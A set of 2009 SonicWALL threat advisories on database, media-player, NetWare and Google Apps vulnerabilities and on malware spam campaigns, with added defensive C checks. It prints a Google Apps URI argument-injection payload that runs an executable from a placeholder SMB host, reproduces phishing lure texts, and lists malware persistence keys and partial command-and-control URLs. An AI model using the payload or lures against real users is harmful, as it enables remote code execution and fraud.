Posts

Oracle CREATE_TABLES SQL Injection (Oct 30, 2009)

The Oracle Database Server ships preloaded with extra packages that extend its functionality. These packages take the form of procedures, functions, variables, and so on; essentially they are sets of SQL statements stored on the server side as precompiled SQL.

One of the packages included with the database server, responsible for configuration and administration of the database, is the ConText package. It contains two predefined users, CTXSYS and CTXDEMO. The CTXSYS user is used for administrative tasks and therefore has a wide range of privileges.

An SQL injection vulnerability exists in the DRVXTABC package, owned by the CTXSYS user. The flaw is in the stored procedure DRVXTABC.CREATE_TABLES. The procedure accepts three arguments: owner, name, and id.
During execution of the vulnerable procedure, the arguments passed to it are not properly sanitized before being used directly to generate an SQL statement; in particular, double quote characters are not removed from them. If a supplied argument contains a double quote, it alters the logic of the generated statement. This allows a database user to inject arbitrary SQL that is executed in the context of the CTXSYS user.

A mitigating factor is that, to exploit this flaw, an attacker must already be logged in and hold execute privileges on the CTXSYS.DRVXTABC.CREATE_TABLES procedure. Furthermore, the injected code must result in a well-formed SQL statement in order to be committed, as the whole operation is treated as an atomic command. Any successfully injected SQL is executed with the security privileges of the database administrator, SYSDBA.
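As an added illustration (not Oracle's code), the C below places the unsafe pattern the alert describes beside a hardened builder: the checked version accepts an identifier only if every double quote in it is one half of an adjacent pair, so a stray quote can never close the quoted identifier early (the same pairing rule DBMS_ASSERT.ENQUOTE_NAME enforces). The statement shape and the `id NUMBER` column are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern: caller-supplied owner and name are spliced straight into
 * the statement. A lone '"' in either argument closes the quoted identifier
 * early and whatever follows becomes part of the SQL text. */
int build_create_table_unchecked(const char *owner, const char *name,
                                 char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "CREATE TABLE \"%s\".\"%s\" (id NUMBER)",
                     owner, name);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

/* Returns 1 when `name` is non-empty and every '"' in it is part of an
 * adjacent pair ("" is how a quote is escaped inside a quoted identifier);
 * returns 0 for an empty name or any stray quote. */
int is_safe_quoted_name(const char *name)
{
    size_t len = strlen(name);
    if (len == 0) return 0;
    for (size_t i = 0; i < len; i++) {
        if (name[i] != '"') continue;
        if (i + 1 < len && name[i + 1] == '"') { i++; continue; } /* paired */
        return 0;                                                 /* stray */
    }
    return 1;
}

/* Hardened builder: validates both identifiers before emitting any SQL.
 * Returns the statement length, or -1 on rejection or a too-small buffer. */
int build_create_table_checked(const char *owner, const char *name,
                               char *out, size_t outlen)
{
    if (!is_safe_quoted_name(owner) || !is_safe_quoted_name(name))
        return -1;
    return build_create_table_unchecked(owner, name, out, outlen);
}
```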

SonicWALL has released an IPS signature that detects and blocks generic attack attempts targeting this vulnerability. The following signature has been released:

  • 4632 – Oracle DB CREATE_TABLES SQL Injection Attempt

New social engineering tactics by Bredolab and ZBot (Oct 30, 2009)

The SonicWALL UTM Research team has observed a new social engineering tactic being used to spam new variants of the Bredolab and Zbot Trojans. The Facebook password reset spam campaign started on October 26, 2009 and involves a fake e-mail message pretending to come from the Facebook team, informing the user that their Facebook account password has been reset. The attached document, which supposedly contains the new password, is in fact the new Bredolab Trojan variant.

The Myspace password reset spam campaign started on October 29, 2009 and likewise involves a fake e-mail message pretending to come from the Myspace team, informing the user that their Myspace account password has been reset. The attached document, which supposedly contains the new password, is in fact the new ZBot Trojan variant.

SonicWALL has so far received more than 65,000 e-mail copies from these spam campaigns, involving 96 Bredolab variants and 10 Zbot variants. The e-mail message format looks like this:

Campaign #1 – Facebook Password Reset spam

Attachment: Facebook_Password_99176.zip (contains Facebook_Password_99176.exe)

Subject: Facebook Password Reset Confirmation! Please Attention!

Email Body:
————————
Hey [random name] ,

Because of the measures taken to provide safety to our clients, your password has been changed.
You can find your new password in attached document.

Thanks,
The Facebook Team.
————————

A sample e-mail message looks like:

screenshot

The executable file inside the zip attachment has an icon disguised as a Microsoft Excel sheet file:

screenshot

Campaign #2 – Myspace Password Reset spam

Attachment: myspace_94354.zip (contains myspace_94354.exe)

Subject: Myspace Password Reset Confirmation

Email Body:
————————
Hello,

Because of the measures taken to provide safety to our clients, your password has been changed. You can find your new password in attached document.

Thanks,
The Myspace Team
————————

A sample e-mail message looks like:

screenshot

SonicWALL Gateway AntiVirus provided proactive protection against the Facebook spam campaign via the GAV: Bredolab.X_3 (Trojan) signature [16,498,402 hits recorded in the last five days] and against the Myspace spam campaign via the GAV: Zbot.VM (Trojan) signature [4,009,386 hits recorded in the last three days].

screenshot

screenshot

MS Windows Media Player Integer Overflow (Oct 23, 2009)

The Advanced Systems Format (ASF) is an extensible file format designed for storing and playing synchronized digital media streams. An ASF file is organized in multiple sections called objects. Every ASF object begins with a globally unique identifier (GUID) and a size field, followed by the object data. Two vulnerabilities exist in the Windows Media Format runtime library, which is responsible for processing ASF files. The vulnerabilities are due to integer overflow errors during handling of ASF files. The following two ASF objects are affected:

  • ASF_Simple_Index_Object GUID 33000890-E5B1-11CF-89F4-00A0C90349CB
  • ASF_Marker_Object GUID F487CD01-A951-11CF-8EE6-00C00C205365

ASF_Simple_Index_Object structure is as follows:

Field name              Field type      Size
----------------------- --------------- -----------
ObjectID                GUID            16
ObjectSize              QWORD           8
FileID                  GUID            16
IndexTimeInterval       QWORD           8
MaxPacketCount          DWORD           4
IndexEntriesCount       DWORD           4 (=x)
IndexEntries            IndexEnt        IndexEnt[x]

The vulnerable function that parses the ASF_Simple_Index_Object uses the IndexEntriesCount field value to calculate the size of the buffer required to hold the index data. In certain situations this size calculation overflows, producing an undersized buffer. The index data is then copied into the allocated buffer in a loop controlled by the original counter value, so the buffer is overrun with user-controlled data.

ASF_Marker_Object structure is as follows:

Field name              Field type      Size
----------------------- --------------- -----------
ObjectID                GUID            16
ObjectSize              QWORD           8
Reserved                GUID            16
MarkersCount            DWORD           4 (=x)
Reserved                WORD            2
NameLength              WORD            2 (=y)
Name                    WCHAR           y
Markers                 MarkerEnt       MarkerEnt[x]

The vulnerable function that parses the ASF_Marker_Object uses the MarkersCount field value to calculate the size of the required buffer. This calculation may likewise overflow, so the buffer allocated is of insufficient size.
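The following C is an added example, not Microsoft's code, showing the wrapping 32-bit size computation for ASF_Simple_Index_Object beside a hardened version that multiplies in 64 bits and requires the entries to fit inside the object's own ObjectSize; the same multiply-and-fit check applies to MarkersCount in ASF_Marker_Object. The 6-byte entry size (DWORD packet number plus WORD packet count) is taken from the ASF specification; the header builder is a constructed test helper.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Bytes before the entry array: ObjectID 16 + ObjectSize 8 + FileID 16 +
 * IndexTimeInterval 8 + MaxPacketCount 4 + IndexEntriesCount 4. */
#define SIMPLE_INDEX_HDR 56u
/* One simple index entry: DWORD PacketNumber + WORD PacketCount. */
#define INDEX_ENTRY_SIZE 6u

/* ASF stores integers little-endian. */
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static uint64_t rd64(const uint8_t *p)
{
    return (uint64_t)rd32(p) | ((uint64_t)rd32(p + 4) << 32);
}

/* The vulnerable computation: a 32-bit product that silently wraps once
 * IndexEntriesCount exceeds 0xFFFFFFFF / 6, yielding a tiny allocation while
 * the copy loop still iterates IndexEntriesCount times. */
uint32_t index_bytes_unchecked(uint32_t entries_count)
{
    return entries_count * INDEX_ENTRY_SIZE;
}

/* Hardened version: multiplies in 64 bits and requires the entries to fit
 * both inside the declared ObjectSize and inside the bytes present in memory.
 * Returns 0 and sets *needed on success, -1 on any inconsistency. */
int index_bytes_checked(const uint8_t *obj, size_t obj_len, size_t *needed)
{
    if (obj_len < SIMPLE_INDEX_HDR) return -1;
    uint64_t object_size = rd64(obj + 16);                 /* ObjectSize */
    uint32_t count       = rd32(obj + 52);                 /* IndexEntriesCount */
    if (object_size < SIMPLE_INDEX_HDR || object_size > obj_len) return -1;
    uint64_t bytes = (uint64_t)count * INDEX_ENTRY_SIZE;   /* cannot wrap */
    if (bytes > object_size - SIMPLE_INDEX_HDR) return -1; /* must fit */
    *needed = (size_t)bytes;
    return 0;
}

/* Constructed test helper: writes a Simple Index Object header (GUID fields
 * zeroed) into buf, which must hold at least SIMPLE_INDEX_HDR bytes. */
void make_simple_index(uint8_t *buf, uint64_t object_size, uint32_t entries_count)
{
    memset(buf, 0, SIMPLE_INDEX_HDR);
    for (int i = 0; i < 8; i++) buf[16 + i] = (uint8_t)(object_size >> (8 * i));
    for (int i = 0; i < 4; i++) buf[52 + i] = (uint8_t)(entries_count >> (8 * i));
}
```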

Exploitation requires an attacker to entice the target user to visit a web site that hosts a malicious ASF file. An e-mail attack vector is also feasible, provided that the end user either explicitly opens the attachment or the e-mail client opens it automatically. Successful exploitation may result in malicious code injection and execution.

SonicWALL has developed two IPS signatures that detect and block specific attacks targeting this vulnerability. The signatures that address this flaw are listed below:

  • 4617 – MS Windows Media Player ASF Integer Overflow PoC 1 (MS09-052)
  • 4618 – MS Windows Media Player ASF Integer Overflow PoC 2 (MS09-052)

This vulnerability has been assigned CVE-2009-2527 by MITRE. The vendor has released Microsoft Security Bulletin MS09-052 addressing this issue.

Conflicker.B Infection Alert – New FakeAV variant (Oct 23, 2009)

The SonicWALL UTM Research team observed a new spam campaign that uses a fake Conficker worm infection alert theme to infect users with a new FakeAV Trojan variant.

The e-mail pretends to come from a Windows computer safety division, contains a fake Conficker worm infection alert and asks the user to run the attached scanner file. The e-mail attachment is a ZIP archive that contains the new FakeAV Trojan variant.

The e-mail looks like:

Subject: Conflicker.B Infection Alert [Notice that Conficker is incorrectly spelled as Conflicker]

Attachment: install.zip (contains install.exe)

Email Body:
————————
Dear Microsoft Customer,

Starting 18/10/2009 the ‘Conficker’ worm began infecting Microsoft customers unusually rapidly. Microsoft has been advised by your Internet provider that your network is infected.

To counteract further spread we advise removing the infection using an antispyware program. We are supplying all effected Windows Users with a free system scan in order to clean any files infected by the virus.

Please install attached file to start the scan. The process takes under a minute and will prevent your files from being compromised. We appreciate your prompt cooperation.

Regards,
Microsoft Windows Agent #2 (Hollis)
Microsoft Windows Computer Safety Division
————————

The e-mail message looks like below:

screenshot

SonicWALL has so far received more than 60,000 copies of this spam e-mail, carrying more than 10 distinct attachment payloads.

The malicious executable inside the attachment looks like:

screenshot

If the user downloads and executes the attached scanner file, it performs activities similar to those of the previous variant, covered in the earlier Postcard Spam SonicAlert:

  • It tries to connect to an arbitrary domain from a predetermined list to download a new rogue antivirus application. The run-time memory dump of the malware shows the URLs that it attempts to connect to over HTTP:

    screenshot

  • Creates the following files:
    • (Program Files)\AntivirusPro_2010\AntivirusPro_2010.exe [Detected as GAV: Vilsel.IJR (Trojan)]
    • (Program Files)\AntivirusPro_2010\AVEngn.dll
    • (AppData)\seres.exe [Copy of itself]
    • (AppData)\svcst.exe [Copy of itself]

  • Ensures that the malicious executables run every time Windows restarts by making the following Registry modifications:
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Antivirus Pro 2010 = ""(Program Files)\AntivirusPro_2010\AntivirusPro_2010.exe" /hide"
    • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mserv = "(AppData)\seres.exe"
    • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "(AppData)\svcst.exe"
  • It opens a Windows notification claiming that Windows has detected a spyware infection, as seen below:

    screenshot

  • If the user clicks on the notification window, it executes the AntivirusPro_2010.exe that it downloaded from the remote site:

    screenshot

The Trojan is also known as W32/FakeRean.E [F-Prot], Adware/AntivirusPro2010 [Panda], and TrojanDownloader:Win32/FakeRean [Microsoft].

SonicWALL Gateway AntiVirus provided proactive protection against multiple variants of this malware via the GAV: FakeAV.DW (Trojan) signature [Total hits recorded since release of the signature: 12,581,546].

screenshot

Postcard spam – New FakeAV Trojan (Oct 16, 2009)

The SonicWALL UTM Research team observed a new wave of the Postcard spam campaign during the last three days.

The e-mail pretends to come from 123Greetings.com and contains an e-card as an attachment. The e-mail attachment is a ZIP archive that contains the new FakeAV Trojan variant.

The e-mail looks like:

Subject: You’ve received a postcard

Attachment: ecard.zip (contains ecard.exe)

Email Body:
————————
Good day.

Your family member has sent you an ecard from 123greetings.com.

Send free ecards from 123greetings.com with your choice of colors, words and music.

Your ecard will be available with us for the next 30 days.

If you wish to keep the ecard longer, you may save it on your computer or take a print.

To view your ecard, open zip attached file.
————————

The e-mail message looks like below:

screenshot

The e-mail body remained the same, but the attachment payload kept changing every few hours over the last 3 days. SonicWALL has so far received more than 50,000 copies of this spam e-mail, carrying more than five distinct attachment payloads.

The malicious executable inside the attachment looks like:

screenshot

If the user downloads and executes the attached ecard, it performs the following activities:

  • It tries to connect to an arbitrary domain from a predetermined list to download a new rogue antivirus application. The run-time memory dump of the malware shows the URLs that it attempts to connect to over HTTP:

    screenshot

  • Creates the following files:
    • (Program Files)\AntivirusPro_2010\AntivirusPro_2010.exe [Detected as GAV: Vilsel.IJR (Trojan)]
    • (Program Files)\AntivirusPro_2010\AVEngn.dll
    • (AppData)\seres.exe
    • (AppData)\svcst.exe
  • Ensures that the malicious executables run every time Windows restarts by making the following Registry modifications:
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Antivirus Pro 2010 = ""(Program Files)\AntivirusPro_2010\AntivirusPro_2010.exe" /hide"
    • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mserv = "(AppData)\seres.exe"
    • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "(AppData)\svcst.exe"
  • It opens a Windows notification claiming that Windows has detected a spyware infection, as seen below:

    screenshot

  • If the user clicks on the notification window, it executes the AntivirusPro_2010.exe that it downloaded from the remote site:

    screenshot

The Trojan is also known as W32/FakeRean.A [F-Prot], Rogue:W32/Agent.MCF [F-Secure], and Generic FakeAlert!cr [McAfee].

SonicWALL Gateway AntiVirus provided proactive protection against multiple variants of this malware via the GAV: Kryptik.ASA_2 (Trojan) signature [Total hits recorded in the last 3 days: 6,937,170].

screenshot

Google Apps URI Argument Injection (Oct 16, 2009)

Google Apps is a service from Google featuring several web applications with functionality similar to traditional office suites, including Gmail, Google Calendar, Talk, Docs and Sites. When Google Apps is installed, the application registers a handler for the googleapps.url.mailto:// URI scheme. The generic format of the scheme is as follows:

googleapps.url.mailto://

Google Apps supports multiple command-line options. One such argument, "--domain", causes Google Chrome to start and process the specified URL. Google Chrome also supports multiple command-line options: "--no-sandbox" disables Google Chrome's security sandbox, and "--renderer-path" causes Google Chrome to execute the specified program, even from an SMB share.

An argument injection vulnerability exists in Google Apps. Specifically, it resides in the processing of a googleapps.url.mailto:// URI that contains double quotes ("). By combining the "--domain", "--renderer-path" and "--no-sandbox" arguments, one can make Google Chrome execute an arbitrary command. A generic example of such a malicious URL looks like:

googleapps.url.mailto://"%20--domain="--x%20--renderer-path=\\HOST\PATH\MALICIOUS.exe%20--no-sandbox%20--x"/

which will execute the following command:

chrome.exe --renderer-path=\\HOST\PATH\MALICIOUS.exe --no-sandbox

Google Chrome does not ask for user permission or notify the user of such commands. Remote attackers could exploit this vulnerability by enticing a target user to open a web page containing a specially crafted googleapps.url.mailto:// URI. Successful exploitation would result in injection and execution of commands passed to the Google Chrome program. The vulnerability has been assigned Bugtraq ID 36581. It affects Google Apps v1.1.110 6031 and prior.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 3174 – Google Apps URI Argument Injection

Fake IRS Notice – New ZBot variant (Oct 09, 2009)

The SonicWALL UTM Research team observed a new wave of the fake IRS notice campaign during the last three days.

The e-mail pretends to come from an irs.gov e-mail address and contains a URL to an IRS notice about unreported income. If the user clicks on this URL, it leads to the download of a new ZBot Trojan variant.

The e-mail looks like:

Subject: Notice of Underreported Income

Email Body:
————————
Taxpayer ID: [email handle-(14 digit random number)US] Tax Type: INCOME TAX
Issue: Unreported/Underreported Income (Fraud Application)

Please review your tax statement on Internal Revenue Service (IRS) website (click on the link below):

review tax statement for taxpayer id: [email handle-(14 digit random number)US] (<-- Malicious URL)

Internal Revenue Service
————————

The e-mail message looks like below:

screenshot

The site that opens when the user clicks on the URL inside the e-mail is shown below:

screenshot

As seen in the screenshot, the malicious site prompts the user to download and execute the IRS notice, which in reality is the malware executable, shown here:

screenshot

The new ZBot variant performs the following activities upon execution:

  • Creates the following files:
    • (Windows_System)\lowsec\local.ds
    • (Windows_System)\lowsec\user.ds
    • (Windows_System)\lowsec\user.ds.lll
    • (Windows_System)\sdra64.exe [Copy of itself]

  • Ensures that it runs every time Windows restarts by modifying the following registry entry:
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: "(Windows_System)\userinit.exe,(Windows_System)\sdra64.exe,"
  • It tries to connect to a predetermined IP address on the HTTP port and sends the following GET requests:
    • http://195.93.208(REMOVED)livs/rec.php
    • http://195.93.208(REMOVED)lcc/ip1.gif
    • http://195.93.208(REMOVED)ip.php

The Trojan is also known as Trojan-Spy.Win32.Zbot [Ikarus] and Trojan-Spy.Win32.Zbot.gen [Kaspersky].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Zbot.GEN_84 (Trojan) and GAV: Zbot.GEN_85 (Trojan) signatures.

NetWare Portmapper Buffer Overflow (Oct 8, 2009)

NetWare is a network operating system developed by Novell. It provides file sharing and other services such as printing and e-mail. The Remote Procedure Call (RPC) portmapper is a service that maps RPC program numbers to network addresses and port numbers. When a client wishes to make an RPC call to a given program number, it first contacts the portmapper to determine the network address and port number to which RPC packets should be sent. The library PKERNEL.NLM provides NetWare with portmapper and RPC functionality.

The portmapper hosts a service, portmap (program number 100000), which can be accessed via a CALLIT RPC message. A stack-based buffer overflow vulnerability exists in NetWare's portmapper module PKERNEL.NLM. Specifically, the vulnerable function copies Argument Length bytes from a CALLIT RPC message into a fixed-size stack buffer without performing a boundary check. An attacker can exploit this vulnerability by sending a malicious CALLIT RPC message with an overly long Argument Length to the affected portmap service. Successful exploitation could lead to remote code execution in the context of the portmap service, normally root. The vulnerability has been assigned Bugtraq ID 36564. It affects the latest version of NetWare, v6.5.0 SP8; other versions may also be affected.
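As an added example (not Novell's code), this C decoder for the CALLIT argument block (prog, vers, proc, opaque args<>) shows the boundary check the alert says is missing: Argument Length is compared against both the destination buffer and the bytes remaining in the message before anything is copied. The 256-byte buffer size and the message builder are assumptions made for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define ARG_BUF_SIZE 256u   /* assumed: the fixed-size buffer args are copied into */

/* XDR encodes integers big-endian. */
static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Decoded CALLIT argument block: prog, vers, proc and the opaque args<>
 * field (4-byte length followed by the bytes, padded to a multiple of 4). */
struct callit_args {
    uint32_t prog, vers, proc;
    uint32_t arg_len;
    uint8_t  args[ARG_BUF_SIZE];
};

/* Decodes the CALLIT arguments from `msg` (the bytes after the RPC call
 * header). Returns 0 on success, -1 if the block is truncated or Argument
 * Length exceeds the destination buffer or the bytes left in the message. */
int decode_callit_args(const uint8_t *msg, size_t len, struct callit_args *out)
{
    if (len < 16) return -1;                    /* prog, vers, proc, arg_len */
    out->prog    = be32(msg);
    out->vers    = be32(msg + 4);
    out->proc    = be32(msg + 8);
    out->arg_len = be32(msg + 12);
    if (out->arg_len > ARG_BUF_SIZE) return -1; /* the missing boundary check */
    size_t padded = ((size_t)out->arg_len + 3) & ~(size_t)3; /* XDR padding */
    if (padded > len - 16) return -1;           /* would read past the message */
    memcpy(out->args, msg + 16, out->arg_len);
    return 0;
}

/* Constructed test helper: builds a CALLIT argument block into buf, which
 * must hold 16 + arg_len rounded up to a multiple of 4 bytes. Returns the
 * number of bytes written. */
size_t make_callit_args(uint8_t *buf, uint32_t prog, uint32_t vers, uint32_t proc,
                        const uint8_t *args, uint32_t arg_len)
{
    uint32_t hdr[4] = { prog, vers, proc, arg_len };
    for (int i = 0; i < 4; i++)
        for (int b = 0; b < 4; b++)
            buf[i * 4 + b] = (uint8_t)(hdr[i] >> (24 - 8 * b));
    size_t padded = ((size_t)arg_len + 3) & ~(size_t)3;
    memset(buf + 16, 0, padded);
    memcpy(buf + 16, args, arg_len);
    return 16 + padded;
}
```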

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 2068 – Novell NetWare Portmapper BO Attempt

New botnet alert – Mariposa (Oct 6, 2009)

The SonicWALL UTM Research team has observed reports of the Mariposa botnet, which according to Defence Intelligence has infiltrated half of the Fortune 100 companies. It has been speculated that this botnet was created from the Butterfly Bot Kit; it now consists of 200,000 infected hosts and infects 7,000 more daily. More details can be found on their blog.

Mariposa is really a collection of different malware threats, detected under different names. For instance, F-Secure detects them as either Palevo or Vaklik.

Symantec has added detection for it as W32.Pilleuz.

When executed this threat has the following characteristics:

  • Spreads through removable drives and MSN Instant Messenger
  • Spreads through peer-to-peer file sharing by copying itself to shared folders for the following programs:
    • Ares
    • BearShare
    • DC++
    • eMule
    • iMesh
    • Kazaa
    • LimeWire
    • Shareaza
  • Gives the attacker control over the compromised system
  • Communicates with a predetermined list of back-end servers

SonicWALL Gateway AntiVirus provides protection against this botnet via various GAV signatures including: Small.DKC (Trojan), Agent.PT_7 (Trojan), CodecPack.HZE (Trojan), FakeRean (Trojan), Conficker.gen (Worm), Agent.IRB (Trojan), Malagent_2 (Trojan), Rimecud.B (Worm).

The SonicWALL UTM Research team is monitoring the situation and will update the signatures as necessary to provide complete protection against this and other threats.

Fake Twitter spam – Merond Worm (Oct 2, 2009)

The SonicWALL UTM Research team observed a new Merond worm variant being spammed in the wild via fake Twitter invitation e-mail messages. The e-mail message looks like this:

Sender: invitations@twitter.com [Spoofed sender address]

Subject: Your friend invited you to twitter!

Attachment: Invitation Card.zip [ Contains document.doc (spaces) .exe ]

The malicious executable inside the attachment is the new mass-mailing worm variant; the file looks like:

screenshot

A sample e-mail message is shown below:

screenshot

When executed, the worm performs the following activities on the victim machine:

  • Injects a malicious executable into multiple system files on the victim machine, some of which are listed below:
    • (System Folder)\attrib.exe
    • (System Folder)\bootcfg.exe
    • (System Folder)\calc.exe
    • (System Folder)\chkdsk.exe
  • Determines the IP address of the victim machine by sending a GET request to whatismyip.com
  • E-mails a copy of itself to the e-mail addresses harvested from the victim machine
  • Collects sensitive information from the victim machine and sends it to a predetermined IP address on port 65520. A sample encrypted packet is shown below:

    screenshot

  • Downloads rogueware applications onto the victim machine.

This malware is also known as TR/Buzus.caro [AntiVir], Worm:Win32/Prolaco.gen!C [Microsoft], and Worm:W32/Prolaco.D [F-Secure].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Merond.V (Worm) signature.
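As an added defender-side check (not SonicWALL's code), this C routine classifies attachment and archive-member names like those seen in the campaigns above; the whitespace-padded decoy extension of the "document.doc (spaces) .exe" member inside Invitation Card.zip is the case it looks for specifically. The list of executable extensions is an assumption for the example.

```c
#include <ctype.h>
#include <string.h>

/* Extensions that run as code when double-clicked on Windows (assumed list). */
static const char *const EXEC_EXTS[] = { "exe", "scr", "pif", "com", "bat", "cmd" };

/* Returns a pointer to the final extension (after the last '.'), ignoring
 * trailing whitespace, or NULL when there is none. Sets *ext_len. */
static const char *final_extension(const char *name, size_t *ext_len)
{
    const char *dot = strrchr(name, '.');
    if (!dot || dot[1] == '\0') return NULL;
    const char *end = name + strlen(name);
    while (end > dot + 1 && isspace((unsigned char)end[-1])) end--;
    *ext_len = (size_t)(end - (dot + 1));
    return dot + 1;
}

/* Case-insensitive match of an n-byte extension against EXEC_EXTS. */
static int ext_is_executable(const char *ext, size_t n)
{
    for (size_t i = 0; i < sizeof EXEC_EXTS / sizeof EXEC_EXTS[0]; i++) {
        if (strlen(EXEC_EXTS[i]) != n) continue;
        size_t k = 0;
        while (k < n && tolower((unsigned char)ext[k]) == EXEC_EXTS[i][k]) k++;
        if (k == n) return 1;
    }
    return 0;
}

/* Classifies one attachment (or archive member) file name:
 *   0  nothing notable
 *   1  executable extension
 *   2  executable extension hidden behind a decoy extension plus a run of
 *      whitespace ("document.doc        .exe"), which pushes the real
 *      extension out of view in a narrow mail-client column. */
int classify_attachment(const char *name)
{
    size_t n;
    const char *ext = final_extension(name, &n);
    if (!ext || !ext_is_executable(ext, n)) return 0;
    const char *dot = ext - 1;                  /* the final '.' */
    const char *p = dot;
    while (p > name && isspace((unsigned char)p[-1])) p--;
    if (p == dot) return 1;                     /* no padding before the '.' */
    const char *q = p;                          /* is there a decoy ".xxx" before the padding? */
    while (q > name && q[-1] != '.') q--;
    return (q > name) ? 2 : 1;
}
```

A ZIP attachment itself is not flagged; apply the same routine to each member name listed in the archive.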